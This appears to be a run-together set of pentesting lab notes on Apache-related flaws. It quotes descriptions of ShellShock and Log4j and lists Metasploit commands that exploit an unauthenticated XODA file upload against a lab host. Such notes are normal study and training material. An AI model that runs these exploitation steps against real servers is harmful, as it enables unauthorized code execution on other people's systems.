APACHE
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.
Bashshell since v.1.3The
Bashmistakenly exectutes trailing commands after a series of charactersApache web servers that run CGI or
.shscripts are also vulnerable
it is vulnerable to .cgi scripts which can be manipulated and can be taken advantage of
Apache-Shellshock(Bash)Metasploit Exploitation2. Xoda file upload
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))curl http://192.170.151.3search xoda
use exploit/unix/webapp/xoda_file_upload
info
# Description:
# This module exploits a file upload vulnerability found in XODA
# 0.4.5. Attackers can abuse the "upload" command in order to upload a
# malicious PHP file without any authentication, which results in
# arbitrary code execution. The module has been tested successfully on
# XODA 0.4.5 and Ubuntu 10.04.
set TARGETURI /
runLog4J
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Last updated